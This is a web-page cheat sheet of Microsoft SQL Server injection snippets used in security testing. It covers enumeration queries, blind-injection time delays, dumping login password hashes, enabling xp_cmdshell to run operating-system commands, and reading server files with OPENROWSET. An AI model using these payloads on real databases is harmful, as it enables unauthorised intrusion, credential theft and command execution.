MSSQL Injection Cheat Sheet

Author: HollyGraceful Published: 05 August 2021 Last Updated: 03 November 2022

# Comments
/* Comment /*
-- -


# Version
SELECT @@VERSION;
SELECT version();


# User details
current_user()
suser_name()
system_user()


# Database details
SELECT db_name();


# Database credentials
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins


# Server details
SELECT host_name();


# Table Name
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT table_name FROM information_schema.tables;


# Columns Names
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename');
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


# String Concatenation
CONCAT(foo, bar)

 
# Conditionals
SELECT IIF(1=1, 1, 0);

 
# Time-delay
WAITFOR DELAY '0:0:9'


# Command Execution
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
EXEC xp_cmdshell 'dir'; 


# Read Files
SELECT * FROM OPENROWSET(BULK N'', SINGLE_CLOB) AS Contents


# Substrings
SELECT SUBSTRING('Foobar', 1, 1);

Article Tags

Cheat Sheet SQLi SQL Injection

MSSQL Injection Cheat Sheet

Article Tags

We use Cookies!

We use Cookies!